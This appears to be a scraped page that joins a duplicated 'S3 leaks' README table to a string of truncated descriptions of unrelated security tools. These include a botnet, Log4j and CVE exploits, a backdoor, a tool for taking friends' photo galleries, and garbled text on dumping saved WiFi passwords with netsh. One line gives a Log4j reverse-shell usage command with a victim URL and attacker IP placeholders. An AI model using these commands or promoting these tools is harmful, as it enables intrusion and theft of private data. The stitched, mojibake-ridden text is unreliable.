s3-leaks
List of AWS S3 Leaks
Feel free to send in a PR if you know of other leaks
Elastic Search
Date | Description | Notes |
---|---|---|
Sep 2017 | AWS hosted elastic search servers hijacked |
Feel free to send in a PR if you know of other leaks
Date | Description | Notes |
---|---|---|
Sep 2017 | AWS hosted elastic search servers hijacked |
Questions? Join the Discord support server Disclaimer: This project should be used for authorized testing or educational purposes only. BYOB is an ope
A hashtag check python module
Log4jTools Tools for investigating Log4j CVE-2021-44228 FetchPayload.py (Get java payload from ldap path provided in JNDI lookup). Example command: Re
A curated list of amazingly awesome Cybersecurity datasets
This is a Password database I made for myself, as I want to keep all my passwords in the same place. but still protected, shall anyone get access to the file. And so I made this simple password datab
Pardus Lookout We protect the privacy of the data on your computer by using the camera of your Debian based Pardus operating system. The application i
CVE-2022-22963 CVE-2022-22963 PoC Slight modified for English translation and detection of https://github.com/chaosec2021/Spring-cloud-function-SpEL-R
The easiest way to HACK A GALLARY, Get every part of your friends' gallery ( 100% Working ) | Tool By John Kener π±π°
PyPassKeep Encrypted Python Password Manager About PyPassKeep (PPK for short) is an encrypted python password manager used to secure your passwords fr
Data analysis Document here the project: DriverDrowsinessDetector Description: Project Description Data Source: Type of analysis: Please document the
CVE 2020-14871 Solaris exploit This is a basic ROP based exploit for CVE 2020-14871. CVE 2020-14871 is a vulnerability in Sun Solaris systems. The act
Log4j2-CVE-2021-44228-revshell Usage For reverse shell: $~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [At
This framework helps reverse engineer Flutter apps using patched version of Flutter library which is already compiled and ready for app repacking. There are changes made to snapshot deserialization p
python WIFIεε²ε―η ζ₯ηε¨ WIFIε―η ζ₯ηε¨ εη win+RοΌθΎε ₯cmdζεΌε½δ»€θ‘ηͺε£ #θΏδΈͺε½δ»€ε―δ»₯εεΊδ½ ζζθΏζ₯θΏηwifi netsh wlan show profiles #ζΏζ’δ½ θ¦ζ₯ζΎηWiFiεη§°οΌε°±ε―δ»₯ζΎη€ΊεΊθΏδΈͺwifiηζζδΏ‘ζ―οΌε ζ¬ε―η netsh wlan show
DSLF DSLF stands for (D)arth (S)ide of the (L)og4j (F)orce. It is the ultimate log4j vulnerabilities assessor. It comes with four individual Python3 m
CVE-2021-3625 This repository contains a few example exploits for CVE-2021-3625. All Zephyr-based usb devices up to (and including) version 2.5.0 suff
All in One CRACKER911181's Tool. This Tool For Hacking and Pentesting. π
ββββββββββ ββ βββββββ ββββββ ββββββ ββββ βββββββ ββββββββββββββββββ ββββββββββββββββββββββββββββββββββββββββββ ββββββββ ββββββββββββββββββ
A script based on sqlmap that uses sql injection vulnerabilities to traverse the existence o
Backdoor This is a Backdoor, created with Python 3. Types of Commands: Downloading / Uploading files. Launching / Deleting / Reading file's content. S